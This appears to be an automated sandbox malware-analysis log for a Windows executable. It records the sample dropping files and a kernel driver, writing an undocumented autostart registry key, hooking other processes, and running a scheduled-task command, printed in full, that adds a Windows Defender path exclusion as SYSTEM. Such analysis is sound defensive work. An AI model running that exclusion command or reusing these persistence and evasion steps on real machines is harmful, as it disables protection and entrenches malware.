Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: vselog.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: twext.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: cscui.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: workfoldersshell.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: starttiledata.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: usermgrproxy.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: acppage.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: msi.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: aepic.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: tbcore3u.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: sxs.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: devenum.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: winmm.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: devobj.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msdmo.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: avicap32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: msvfw32.dllJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeSection loaded: tbcore3u.dll
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
Source: 2b687482300.6345827638.08.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 2b687482300.6345827638.08.exeStatic file information: File size 30883840 > 1048576
Source: 2b687482300.6345827638.08.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d58200
Source: 2b687482300.6345827638.08.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: G5CQjd.exe, 00000028.00000000.3437121582.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 00000029.00000002.3482527026.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 00000029.00000000.3464191213.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, Cy9OUo.exe, 0000002A.00000000.3469206986.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002A.00000002.3484346566.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002D.00000002.3499578790.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002D.00000000.3491990756.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002E.00000000.3579031648.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, Cy9OUo.exe, 0000002E.00000002.3594006751.00000000001F8000.00000002.00000001.01000000.0000000C.sdmp, G5CQjd.exe, 0000002F.00000002.3596772792.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe, 0000002F.00000000.3584367115.0000000000718000.00000002.00000001.01000000.0000000A.sdmp, G5CQjd.exe.6.dr, Cy9OUo.exe.40.dr
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 2b687482300.6345827638.08.exe, 00000000.00000003.2622438995.00000000048DB000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622589579.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2659884614.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622681734.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, 2b687482300.6345827638.08.exe, 00000000.00000003.2622615056.00000000048E4000.00000004.00000020.00020000.00000000.sdmp, EMp3o1.exe, 00000005.00000002.2765412481.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe, 00000005.00000000.2758749263.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe, 00000006.00000000.2978571160.0000000140014000.00000002.00000001.01000000.00000008.sdmp, EMp3o1.exe.0.dr
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_000000014000F000
Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
Source: tbcore3U.dll.6.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.6.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.6.drStatic PE information: section name: .mo:
Source: tbcore3U.dll.40.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.40.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.40.drStatic PE information: section name: .mo:
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeCode function: 41_2_00712691 push ecx; ret 41_2_007126A4
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeCode function: 42_2_001F2691 push ecx; ret 42_2_001F26A4

Persistence and Installation Behavior

barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\EMp3o1.exeJump to dropped file
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Users\user\Documents\EMp3o1.exeFile created: C:\Program Files (x86)\G5CQjd\tbcore3U.dllJump to dropped file
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeFile created: C:\Program Files (x86)\E2ky7uqb\tbcore3U.dllJump to dropped file
Source: C:\Users\user\Documents\EMp3o1.exeFile created: C:\Program Files (x86)\G5CQjd\G5CQjd.exeJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeFile created: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Users\user\Documents\EMp3o1.exeJump to dropped file
Source: C:\Users\user\Desktop\2b687482300.6345827638.08.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

Boot Survival

barindex
Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron GroupfenzhuJump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeCode function: 5_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,5_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Documents\EMp3o1.exeMemory written: PID: 5956 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeMemory written: PID: 5956 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeMemory written: PID: 6032 base: 7FFDB4590008 value: E9 EB D9 E9 FF Jump to behavior
Source: C:\Users\user\Documents\EMp3o1.exeMemory written: PID: 6032 base: 7FFDB442D9F0 value: E9 20 26 16 00 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 4548 base: C90005 value: E9 8B 2F 6F 76 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 4548 base: 77382F90 value: E9 7A D0 90 89 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 4548 base: FF0005 value: E9 8B 2F 39 76 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 4548 base: 77382F90 value: E9 7A D0 C6 89 Jump to behavior
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 6888 base: 880005 value: E9 8B 2F B0 76
Source: C:\Program Files (x86)\G5CQjd\G5CQjd.exeMemory written: PID: 6888 base: 77382F90 value: E9 7A D0 4F 89
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 3660 base: 10E0005 value: E9 8B 2F 2A 76
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 3660 base: 77382F90 value: E9 7A D0 D5 89
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 2496 base: 1180005 value: E9 8B 2F 20 76
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 2496 base: 77382F90 value: E9 7A D0 DF 89
Source: C:\Program Files (x86)\E2ky7uqb\Cy9OUo.exeMemory written: PID: 5056 base: FD0005 value: E9 8B 2F 3B 76
